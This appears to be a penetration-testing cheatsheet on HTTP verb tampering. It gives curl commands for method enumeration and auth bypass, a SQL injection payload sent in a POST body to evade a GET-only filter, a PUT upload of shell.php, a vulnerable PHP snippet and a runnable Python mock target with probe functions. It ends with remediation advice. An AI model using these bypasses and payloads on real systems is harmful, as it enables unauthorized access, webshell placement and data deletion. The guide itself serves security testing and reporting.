Methodology Checklist
- Identify restricted endpoints (403 or auth-required responses)
- Try alternate HTTP methods: GET → HEAD, POST, PUT, DELETE, OPTIONS
- Test TRACE for XST (Cross-Site Tracing)
- Override the method via header or parameter (honored only where the framework enables method override): X-HTTP-Method-Override: PUT, X-HTTP-Method: PUT, or a _method=PUT form field
- Identify methods allowed: curl -X OPTIONS http://[TARGET]/endpoint
- Attempt to bypass auth by changing the method to one not covered by the ACL
- Document any method that returns a different or elevated-access response
Operational Context
Use when: Web application restricts access to certain paths → try alternate HTTP methods (PUT, DELETE, HEAD, OPTIONS, TRACE) to bypass GET/POST-only restrictions.
Think Dumber First: curl -X OPTIONS http://[TARGET]/admin/ reveals allowed methods. curl -X PUT http://[TARGET]/admin/file.php may bypass authorization checks that are only applied to GET/POST.
Skip when: Server returns 405 for every method except GET/POST, and HEAD gets the same auth response as GET → the web server restricts methods. Still test the GET→POST switch, because the insecure-coding root cause (filter on $_GET, query on $_REQUEST) does not depend on which verbs the server allows.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| curl -i -X OPTIONS http://[TARGET_IP]/admin/ | Enumerate allowed HTTP methods via the Allow header (a missing header does not prove a verb is blocked) |
| curl -I http://[TARGET_IP]/admin/reset.php | Auth bypass: HEAD executes backend logic without returning a body (use -I; curl -X HEAD waits for a body that never arrives) |
| curl -i -X POST -d "code=1' OR 1=1--" http://[TARGET_IP]/page.php | Filter evasion: POST body bypasses sanitization applied only to GET parameters |
| Burp → right-click request → Change Request Method | Toggle GET↔POST instantly in Burp |
| curl -i -X HACK http://[TARGET_IP]/page.php | Fabricated verb: may bypass filters that check only GET/POST; 405/501 means the server rejected it before the app saw it |
| curl -i -T shell.php http://[TARGET_IP]/upload/ | PUT for arbitrary file write if allowed (-T sends the raw file; -d strips newlines and form-encodes the body) |
Deep Dive & Workflow
Two Root Causes
| Root Cause | Example | Bypass Method |
|---|---|---|
| Insecure server config | `<Limit GET POST>` locks only the listed verbs (the safe form is `<LimitExcept>`); note that on Apache a Limit naming GET also covers HEAD | Send HEAD, OPTIONS, PUT, DELETE, or any other verb not named in the restriction |
| Insecure coding | Filter checks $_GET but query uses $_REQUEST | Switch GET→POST: the filter sees an empty $_GET, while $_REQUEST still receives the POST body |
Auth Bypass Flow (Server Misconfiguration)
1. Hit protected URL → 401 or 403
2. OPTIONS request → note Allow header
3. Burp Repeater → Change Request Method to HEAD
4. Forward → response body empty (HEAD never returns a body)
5. Check app state → backend script still executed (e.g., files deleted, passwords reset)
Critical: HEAD returns 200 OK with no body on success → verify via side effects in the app, not via response content.
Filter Evasion Flow (Insecure Coding)
```php
// Vulnerable pattern: the filter inspects $_GET, but the query is built from $_REQUEST
if (preg_match($pattern, $_GET["code"])) {        // only the query string is checked
    echo "Malicious Request Denied";
} else {
    $query = "... WHERE code = '" . $_REQUEST["code"] . "'"; // $_REQUEST also holds POST (and cookie) data
}
```
1. Payload blocked via GET → "Malicious Request Denied"
2. Burp: Change Request Method → POST
3. Parameters auto-move to the body; $_GET["code"] is unset → the filter passes
4. $_REQUEST["code"] = POST payload → the injection executes
When HEAD Fails → Next Steps
1. Try all verbs from the Allow header: PUT, DELETE, PATCH
2. Try fabricated verbs: HACK, TEST, CUSTOM
3. If the payload fails after the bypass → isolate the two: the method bypass is separate from the injected vulnerability, so verify the payload is correct for the target OS and stack
4. URL-encode special chars in GET payloads (Burp handles this automatically on Change Request Method)
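The Auth Bypass Flow and the Filter Evasion Flow above as one runnable model. This is an added example, not code from the original page: it stands up a constructed Python mock of a target that reproduces both root causes (an ACL on /admin/reset.php that names only GET and POST, and a /page.php filter that inspects the query string while the handler reads merged query-plus-body parameters, the $_GET/$_REQUEST mismatch), then probes it the way the curl and Burp steps do, including the OPTIONS enumeration and a fabricated verb. The loopback host, the "Bearer admin" token, the blocklist and the side-effect counter are assumptions of the mock.

```python
"""Mock a server with both verb-tampering root causes, then probe it.

Constructed example: the server is a stand-in for a target, not real code
from the page. Paths (/admin/reset.php, /page.php) mirror the cheatsheet.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlencode, urlparse

# Side-effect counter: the "backend script" increments it whenever it runs,
# so a HEAD bypass is proven by state change, not by response body.
STATE = {"reset_count": 0}
BLOCKLIST = ("'", "--", ";")            # stand-in for the page's preg_match filter
ALLOWED = "GET, HEAD, POST, PUT, DELETE, OPTIONS"


class VulnHandler(BaseHTTPRequestHandler):
    # Root cause 1 (config): ACL names only GET and POST, like <Limit GET POST>.
    ACL = {"/admin/reset.php": {"GET", "POST"}}

    def _params(self):
        """Return (path, $_GET-like dict, $_POST-like dict) for this request."""
        url = urlparse(self.path)
        query = {k: v[0] for k, v in parse_qs(url.query).items()}
        length = int(self.headers.get("Content-Length", 0))
        body = parse_qs(self.rfile.read(length).decode()) if length else {}
        return url.path, query, {k: v[0] for k, v in body.items()}

    def _respond(self, status, text=""):
        data = text.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        if self.command != "HEAD":          # HEAD: headers only, logic already ran
            self.wfile.write(data)

    def _handle(self):
        if self.command == "OPTIONS":
            self.send_response(204)
            self.send_header("Allow", ALLOWED)
            self.end_headers()
            return
        path, query, body = self._params()
        if path in self.ACL:
            # Auth is checked only for verbs named in the ACL; HEAD/PUT/... skip it.
            if self.command in self.ACL[path] and self.headers.get("Authorization") != "Bearer admin":
                return self._respond(401, "auth required")
            STATE["reset_count"] += 1       # backend logic runs for every verb
            return self._respond(200, "password reset")
        if path == "/page.php":
            # Root cause 2 (code): filter inspects the query string only ($_GET)...
            if any(bad in query.get("code", "") for bad in BLOCKLIST):
                return self._respond(403, "Malicious Request Denied")
            # ...but the query is built from merged params ($_REQUEST), body included.
            code = {**query, **body}.get("code", "")
            return self._respond(200, f"SELECT * FROM codes WHERE code = '{code}'")
        return self._respond(404, "not found")

    # Route every verb, including the fabricated HACK, to the same handler.
    do_GET = do_HEAD = do_POST = do_PUT = do_DELETE = do_OPTIONS = do_HACK = _handle

    def log_message(self, *args):      # keep the demo quiet
        pass


def start_server():
    """Bind the mock target on a random loopback port; returns the server."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), VulnHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(host, port, method, path, data=None, headers=None):
    """One request with an arbitrary verb; returns (status, Allow header, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=data, headers=headers or {})
    resp = conn.getresponse()
    result = (resp.status, resp.getheader("Allow"), resp.read().decode())
    conn.close()
    return result


def enumerate_methods(host, port, path):
    """Checklist step: send OPTIONS and parse the Allow header."""
    _, allow, _ = probe(host, port, "OPTIONS", path)
    return [m.strip() for m in allow.split(",")] if allow else []


def verb_tamper(host, port, path, verbs=("GET", "POST", "HEAD", "PUT", "DELETE", "HACK")):
    """Auth Bypass Flow: hit the protected path with each verb, unauthenticated."""
    return {v: probe(host, port, v, path)[0] for v in verbs}


def filter_evasion(host, port, payload="1' OR 1=1--"):
    """Filter Evasion Flow: same payload via the query string, then via a POST body."""
    encoded = urlencode({"code": payload})
    get_status = probe(host, port, "GET", f"/page.php?{encoded}")[0]
    post_status, _, post_body = probe(host, port, "POST", "/page.php", data=encoded,
                                      headers={"Content-Type": "application/x-www-form-urlencoded"})
    return get_status, post_status, post_body


if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    print("Allow:", enumerate_methods("127.0.0.1", port, "/admin/"))
    print("status by verb:", verb_tamper("127.0.0.1", port, "/admin/reset.php"))
    print("resets executed without auth:", STATE["reset_count"])
    print("filter evasion (GET status, POST status, body):", filter_evasion("127.0.0.1", port))
    srv.shutdown()
```

Against a real target you would replace the mock with the host and keep the probe functions; the two things to carry over are that a verb's status code is compared with the authenticated baseline rather than read in isolation, and that a HEAD "success" is only confirmed by a state change (here the counter, on a target the deleted file or reset password).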
API Verb Tampering
If GET /api/v1/user/1 is read-only:
- PUT /api/v1/user/1 with a JSON body → overwrite the record
- DELETE /api/v1/user/1 → delete the account
- APIs frequently forget to restrict non-GET methods
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| OPTIONS returns empty or 405 | Server hides method list | Try each verb directly: curl -I (HEAD), curl -X PUT, curl -X DELETE; any status other than 405/501 means the method reached the handler, 2xx means it ran |
| PUT upload fails | No write permission or path wrong | Try PUT to an existing file path discovered via enumeration; check if /uploads/ is writable; send the file raw with -T or --data-binary rather than -d |
| TRACE method enabled | XST possible | TRACE is a reporting finding; extract any headers reflected, including cookies |
| DELETE bypasses auth but returns 404 | Resource doesn't exist | DELETE returning 404 (not 405/403) confirms the method is processed; find a valid in-scope resource to delete |
| Auth bypass works in Burp but not curl | Cookie/session not carried | Copy the full Cookie header from the Burp request into curl: -H 'Cookie: session=...' |
Reporting Trigger
Finding Title: HTTP Verb Tampering Bypasses Access Controls
Impact: Inadequate HTTP method restrictions allow unauthorized access to protected endpoints and file upload/modification via non-standard verbs (PUT, DELETE, HEAD), bypassing access controls implemented only for GET/POST.
Root Cause: Access control logic is keyed on the HTTP method rather than enforcing deny-by-default. Server configuration lists the verbs to protect instead of the verbs to allow, so any unlisted method reaches restricted paths.
Recommendation: Implement deny-by-default for all HTTP methods on restricted endpoints and apply authorization checks independent of the verb. Explicitly configure the allowed methods at the web server level (allow-list the verbs in use rather than listing the verbs to protect). Disable TRACE and TRACK. Disable or strictly validate method-override headers and parameters. Test access controls and input filters for all HTTP verbs, not just GET/POST.